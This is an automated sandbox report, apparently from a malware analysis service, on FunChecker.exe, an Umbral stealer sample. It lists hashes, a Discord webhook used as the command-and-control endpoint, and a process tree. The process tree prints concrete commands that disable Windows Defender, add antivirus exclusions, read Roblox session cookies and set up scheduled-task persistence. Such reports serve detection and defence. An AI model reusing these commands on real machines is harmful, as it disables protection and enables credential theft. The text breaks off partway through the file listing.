Analysis

  • max time kernel
    50s
  • max time network
    45s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    19-07-2024 21:39

General

  • Target

    FunChecker.exe

  • Size

    6.6MB

  • MD5

    9dbb7c48ab076c5e10871f7b3266a579

  • SHA1

    cb5c067bbd48eb4b5b28641238bb99400caf1c2f

  • SHA256

    dbafb79e86af01c2dd0cb457e2c016b0cf1bdf3f206e9ec5b9b2c9d484f99bdf

  • SHA512

    498d76541df680c48290c6dcd7bda77b15750e31e1b3fb1c4bfe6ab99ad0aff3eeca367568e8aed37bb35d155fde3fe4c0e32256f0e092a2f43a6a47359ba3ca

  • SSDEEP

    196608:DwALGj59ddZCmZ4JAfd0qQv9N/BuAmISgLPwzYhjqK8pfPnYAmeViD:htmZ4O/Qtu1dmoz2jqK8VPYAjV2

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1263969302936031242/olHrwbuoNh8UxVs0Eh00oYjpj3hs8m4JFfGFTZq-qdru9A_R06a4zPTH8NVHDmX7Crj_

Signatures

  • Detect Umbral payload 3 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 11 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 4 IoCs
  • Executes dropped EXE 3 IoCs
  • Identifies Wine through registry keys 2 TTPs 3 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 3 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies registry class 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 43 IoCs
  • Suspicious use of SendNotifyMessage 43 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\FunChecker.exe
    "C:\Users\Admin\AppData\Local\Temp\FunChecker.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:988
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2016
      • C:\Windows\system32\reg.exe
        reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
        3⤵
        • Modifies Windows Defender Real-time Protection settings
        PID:656
      • C:\Windows\system32\reg.exe
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
        3⤵
          PID:3040
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
          3⤵
            PID:4448
          • C:\Windows\system32\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
            3⤵
              PID:2312
            • C:\Windows\system32\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
              3⤵
              • Modifies Windows Defender Real-time Protection settings
              PID:3820
            • C:\Windows\system32\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
              3⤵
              • Modifies Windows Defender Real-time Protection settings
              PID:608
            • C:\Windows\system32\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
              3⤵
              • Modifies Windows Defender Real-time Protection settings
              PID:4724
            • C:\Windows\system32\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
              3⤵
              • Modifies Windows Defender Real-time Protection settings
              PID:2244
            • C:\Windows\system32\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
              3⤵
              • Modifies Windows Defender Real-time Protection settings
              PID:2384
            • C:\Windows\system32\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
              3⤵
                PID:4224
              • C:\Windows\system32\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                3⤵
                  PID:1368
                • C:\Windows\system32\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                  3⤵
                    PID:4328
                  • C:\Windows\system32\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                    3⤵
                      PID:4108
                    • C:\Windows\system32\reg.exe
                      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                      3⤵
                        PID:3544
                      • C:\Windows\system32\reg.exe
                        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                        3⤵
                          PID:4300
                        • C:\Windows\system32\schtasks.exe
                          schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                          3⤵
                            PID:1124
                          • C:\Windows\system32\schtasks.exe
                            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                            3⤵
                              PID:824
                            • C:\Windows\system32\schtasks.exe
                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                              3⤵
                                PID:4100
                              • C:\Windows\system32\schtasks.exe
                                schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                3⤵
                                  PID:3660
                                • C:\Windows\system32\schtasks.exe
                                  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                  3⤵
                                    PID:1880
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                    3⤵
                                      PID:4708
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                      3⤵
                                        PID:4904
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                        3⤵
                                        • Modifies registry class
                                        PID:4924
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                        3⤵
                                        • Modifies registry class
                                        PID:2452
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                        3⤵
                                        • Modifies registry class
                                        PID:2972
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                        3⤵
                                          PID:2984
                                        • C:\Windows\system32\reg.exe
                                          reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                          3⤵
                                            PID:4228
                                          • C:\Windows\system32\reg.exe
                                            reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                            3⤵
                                              PID:3160
                                            • C:\Windows\system32\reg.exe
                                              reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                              3⤵
                                                PID:4208
                                              • C:\Windows\system32\reg.exe
                                                reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                3⤵
                                                • Modifies security service
                                                PID:4204
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "
                                              2⤵
                                                PID:3280
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anti_pros_disp.bat" "
                                                2⤵
                                                  PID:1876
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker.bat" "
                                                  2⤵
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:1100
                                                  • C:\Windows\system32\chcp.com
                                                    chcp 65001
                                                    3⤵
                                                      PID:4596
                                                  • C:\Users\Admin\AppData\Local\Temp\system32.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\system32.exe"
                                                    2⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Drops file in Drivers directory
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Checks whether UAC is enabled
                                                    • Writes to the Master Boot Record (MBR)
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:1240
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\system32.exe'
                                                      3⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3796
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                      3⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1992
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                      3⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4332
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                      3⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3116
                                                    • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                      "wmic.exe" os get Caption
                                                      3⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4320
                                                    • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                      "wmic.exe" computersystem get totalphysicalmemory
                                                      3⤵
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2528
                                                    • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                      "wmic.exe" csproduct get uuid
                                                      3⤵
                                                        PID:4300
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                        3⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:1152
                                                      • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                        "wmic" path win32_VideoController get name
                                                        3⤵
                                                        • Detects videocard installed
                                                        PID:1516
                                                    • C:\Users\Admin\AppData\Local\Temp\Microsoft OneDrive.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\Microsoft OneDrive.exe"
                                                      2⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Drops startup file
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Adds Run key to start application
                                                      • Checks whether UAC is enabled
                                                      • Writes to the Master Boot Record (MBR)
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:164
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Microsoft OneDrive.exe'
                                                        3⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4496
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft OneDrive.exe'
                                                        3⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4056
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft OneDrive.exe'
                                                        3⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2364
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft OneDrive.exe'
                                                        3⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:2976
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft OneDrive" /tr "C:\Users\Admin\AppData\Roaming\Microsoft OneDrive.exe"
                                                        3⤵
                                                        • Scheduled Task/Job: Scheduled Task
                                                        PID:4672
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        "C:\Windows\System32\schtasks.exe" /delete /f /tn "Microsoft OneDrive"
                                                        3⤵
                                                          PID:1268
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF964.tmp.bat""
                                                          3⤵
                                                            PID:4136
                                                            • C:\Windows\SysWOW64\timeout.exe
                                                              timeout 3
                                                              4⤵
                                                              • Delays execution with timeout.exe
                                                              PID:4636
                                                        • C:\Users\Admin\AppData\Local\Temp\XClient.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
                                                          2⤵
                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                          • Checks BIOS information in registry
                                                          • Drops startup file
                                                          • Executes dropped EXE
                                                          • Identifies Wine through registry keys
                                                          • Adds Run key to start application
                                                          • Checks whether UAC is enabled
                                                          • Writes to the Master Boot Record (MBR)
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:4876
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'
                                                            3⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4988
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
                                                            3⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:500
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\FunCheker.exe'
                                                            3⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:4728
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'FunCheker.exe'
                                                            3⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:4736
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "FunCheker" /tr "C:\Users\Admin\AppData\Roaming\FunCheker.exe"
                                                            3⤵
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:4572
                                                      • C:\Windows\system32\taskmgr.exe
                                                        "C:\Windows\system32\taskmgr.exe" /4
                                                        1⤵
                                                        • Drops file in Windows directory
                                                        • Checks SCSI registry key(s)
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of FindShellTrayWindow
                                                        • Suspicious use of SendNotifyMessage
                                                        PID:1876

                                                      Network

                                                      MITRE ATT&CK Enterprise v15

                                                      Replay Monitor

                                                      Loading Replay Monitor...

                                                      Downloads

                                                      • C:\ProgramData\mntemp

                                                        Filesize

                                                        16B

                                                        MD5

                                                        14c709cc22e8c1a80f9d4375234a594b

                                                        SHA1

                                                        960a6ffb980476ae48eae378912f193fd64cecbb

                                                        SHA256

                                                        dc67cf8499ad8b4bbc53649a62b144eea07d3e288de9bd4f2f8fa7b6777ee256

                                                        SHA512

                                                        49637ce4eb4412b5aa8ac94bf29d130ac9d5d8c20554dd559e47a2d1afd9bf13d9d59e7a5ae52d729c4add79cc72b6c03f50c998dcc61eb6c0482d1b9d4bb688

                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                        Filesize

                                                        2KB

                                                        MD5

                                                        1c19c16e21c97ed42d5beabc93391fc5

                                                        SHA1

                                                        8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68

                                                        SHA256

                                                        1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05

                                                        SHA512

                                                        7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        18KB

                                                        MD5

                                                        6935d32f77d04802ceed8623775877ad

                                                        SHA1

                                                        55c85dfd62291d12c29b526104cec40296435bbb

                                                        SHA256

                                                        fc3dfeaa5847ce5d1b9d6417fa63c3e0e46729688a890c76cf4af8d19ad9da10

                                                        SHA512

                                                        6bf3d6358872e5ff22ce77e5052d6acb69f5c19fc3c06c62357dac14fb78b75f1fa1635ed951ed10352c1de69d27e096eae1559c6a28973610427b09ab097aac

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        18KB

                                                        MD5

                                                        75382a0ef3eb8fc9e57de738814aa6a4

                                                        SHA1

                                                        22e84a43f5097a54e914b6981eae276121ef31ed

                                                        SHA256

                                                        a009304953fb025a2bd5e7ea654a76555245da42e8ef6221b25a5c6b27c999a9

                                                        SHA512

                                                        5fa4d6c62adf898915f134a0d706a0e88df60c4cf8381b53b9f0877a7e3d38dd957a137facc97b969db1fc3b4e6f28b2fccf598e8d7022df23a0380bab631ab8

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        18KB

                                                        MD5

                                                        2dda2e9d03f6b522a29e00a4725009db

                                                        SHA1

                                                        1b3c4b32709e20f26e1dd621c7ee9504365c89f6

                                                        SHA256

                                                        9bec0123c7e37185795a319c87a52c6e49410e2d759e32aa1aaa1ce1483388c2

                                                        SHA512

                                                        dfa714cda01fae95d0b045896626376eaece8f9207131a06d3b03ad32893e4663da8316c41b0769aa9f5be8a1c859314b656bb774e584e48e88d4cdae4b90097

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        18KB

                                                        MD5

                                                        c26a3bcc05b65a4f0193ca1648871856

                                                        SHA1

                                                        b1525ce7c07e59e049239e4edf8bf8ae9a6391c3

                                                        SHA256

                                                        835d53b0a754330fce4b5002806ec35c9145a0ccb5ac3928e933540c79667087

                                                        SHA512

                                                        ebd2a9382fcefa2a7cd5494823c1808e6265edd6867606b866a5b17b4a2dab5006c62cada371ef8e01cd975573064f5556d95104984fe24d3df11903cbd41afb

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        18KB

                                                        MD5

                                                        460e236411dd383f1070cc493c216d47

                                                        SHA1

                                                        544c7f8364bce22f3d96c66623c76498e10b78c8

                                                        SHA256

                                                        ae4820ef82b47ff158fe7d88c40e1bb3d45aa9f0a5bb97adae620303e0ca3940

                                                        SHA512

                                                        889756a8f9df5903a98f68a3b3ac42e739612df5c1cf506b170b120606ae46e98a7e92ad6ba0044c9a047570737a4c85586e797cd99cd7b7e312e2e6d4af5f42

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        18KB

                                                        MD5

                                                        4b41716a322551005ee52c478adbe6e6

                                                        SHA1

                                                        c79ab8d9c0d69a6aee4736c78277e6cce97c5b8a

                                                        SHA256

                                                        f657ca8ebfb0fd7080ede5e11a60b20d3a60a802b2130008ad49633d8ee63689

                                                        SHA512

                                                        a64db6331255226d2cdaff9fcebcf6951c687b18b856474278577597bd08f539c5527d20b0bb69d57f5ef04ebbef2514bb16dba9068cd052e55770813eb4e584

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        18KB

                                                        MD5

                                                        f3fc3b366045d72628b36b064fbbfa6a

                                                        SHA1

                                                        7e8cbd06669e80e258e8e569a3a86e55d0a71b05

                                                        SHA256

                                                        512916185230fbe255c30f1c94ad87058e011d9fda5c053d3f79b18c2ec9e9bc

                                                        SHA512

                                                        3c96afb31e4eea221505736f0a0862a081b16ddac276a409f9716d23ad0f7f5db83dc948228f90cedecb4f8d3e1f7649956a49d9f89e46247998c0212f023a39

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        15KB

                                                        MD5

                                                        77a20d09d22ba7a900d4b3c823af524d

                                                        SHA1

                                                        fb71a1de626aac68a4742376212a5d0e883791ff

                                                        SHA256

                                                        3b95b267075d6efd4acbab1da4262e9eb1d7f71181e34df33ddeaf16fd464957

                                                        SHA512

                                                        1c5483c35623b92dc1e0f95f4dca392c676859554f5d04b402848d2fd21d94fa54791cd3077e5152034b8c839093c75c8fe6639747aed73c4a07e8468450b98e

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        18KB

                                                        MD5

                                                        51bd18ef918fd3915f519beefabdc8a0

                                                        SHA1

                                                        7152826fe041af17cefa00c1a5ef7c5c9e08bcf0

                                                        SHA256

                                                        15cdd287284d4d4c2b8fedf0a4a7b9b647b7522fb1d810bd40fa72a5dde075ec

                                                        SHA512

                                                        7381d965e51ac582ebb3c9d3715958ebf2daf5911233158e2efb86dbdea21d6cee517f8c8b5fb7ca0e20776a5a1e13bc3fd723b752cc5411c2c72b92ad63097d

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        18KB

                                                        MD5

                                                        310d4da44b63ecd5a125c63ff07e7a14

                                                        SHA1

                                                        06de79ac6d19f5dadfa4a020241c1bf14627f938

                                                        SHA256

                                                        a8f7565ac0d4c02b825670848b75489c56e85123a06d8fac49871750aad13fd6

                                                        SHA512

                                                        9814ad800d639fc6f16936dec9eda2435d3d13cdb21dd694e31d183d544e34d77a0624e508ac1c7508434939047439526c97c92167ebc5d119e0745af0710b41

                                                      • C:\Users\Admin\AppData\Local\Temp\FunChecker.bat

                                                        Filesize

                                                        3KB

                                                        MD5

                                                        42afdea7c75bc9074a22ff1be2787959

                                                        SHA1

                                                        24bc20691a1e99e2cf0b2bca78694701fa47720a

                                                        SHA256

                                                        3d005de7ab5cd8684deeb07dd7e280659384bc574ebe2293b470e29a092ecbc2

                                                        SHA512

                                                        d30c5a89fa98534dc53f0e686db7a4eae66c891a4c06f585fcb35f3dcbad372365f175d2b7fa878875812dd9da097181784a35f8f615e8c05668d64a13863bb9

                                                      • C:\Users\Admin\AppData\Local\Temp\Microsoft OneDrive.exe

                                                        Filesize

                                                        2.1MB

                                                        MD5

                                                        c9805a18753f074961692ba5d93173d9

                                                        SHA1

                                                        3735c69e4a6a85f422b1cd4c6e7c6e1b35a5600b

                                                        SHA256

                                                        9941d87b8bc2fdc1600b82c60d3679a0481f571cd41fe2841cc6058c1eb7d8e6

                                                        SHA512

                                                        84cac01b222fa4357086ed5489759b59a8aac79c02d7706007c9f39eb1cbc3a3765701d64d0fcf1f4eafc6124aff15673fd73177631c60d30101cacd2a8b77b2

                                                      • C:\Users\Admin\AppData\Local\Temp\XClient.exe

                                                        Filesize

                                                        2.2MB

                                                        MD5

                                                        26bd039b1fb29f388adf79135f5ba40e

                                                        SHA1

                                                        d144e02494343f05d84326ac384709d824bf7953

                                                        SHA256

                                                        cc32a9b2888305b8854017914aec48af2e8f35402ce72f95efbd86627d9df466

                                                        SHA512

                                                        5eb35f8df5142471154ea3b7e0cc3df776b576b0818bf4ee5134e4e3edc94608b9c15a6f5131b97ee19f85c55fba6ec15fa5783167074d3778a82156ccb3ab57

                                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jgbo2kkz.1rt.ps1

                                                        Filesize

                                                        1B

                                                        MD5

                                                        c4ca4238a0b923820dcc509a6f75849b

                                                        SHA1

                                                        356a192b7913b04c54574d18c28d46e6395428ab

                                                        SHA256

                                                        6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                        SHA512

                                                        4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                      • C:\Users\Admin\AppData\Local\Temp\anti_pros_disp.bat

                                                        Filesize

                                                        842B

                                                        MD5

                                                        ee877037203d8c16d52690baaecfb371

                                                        SHA1

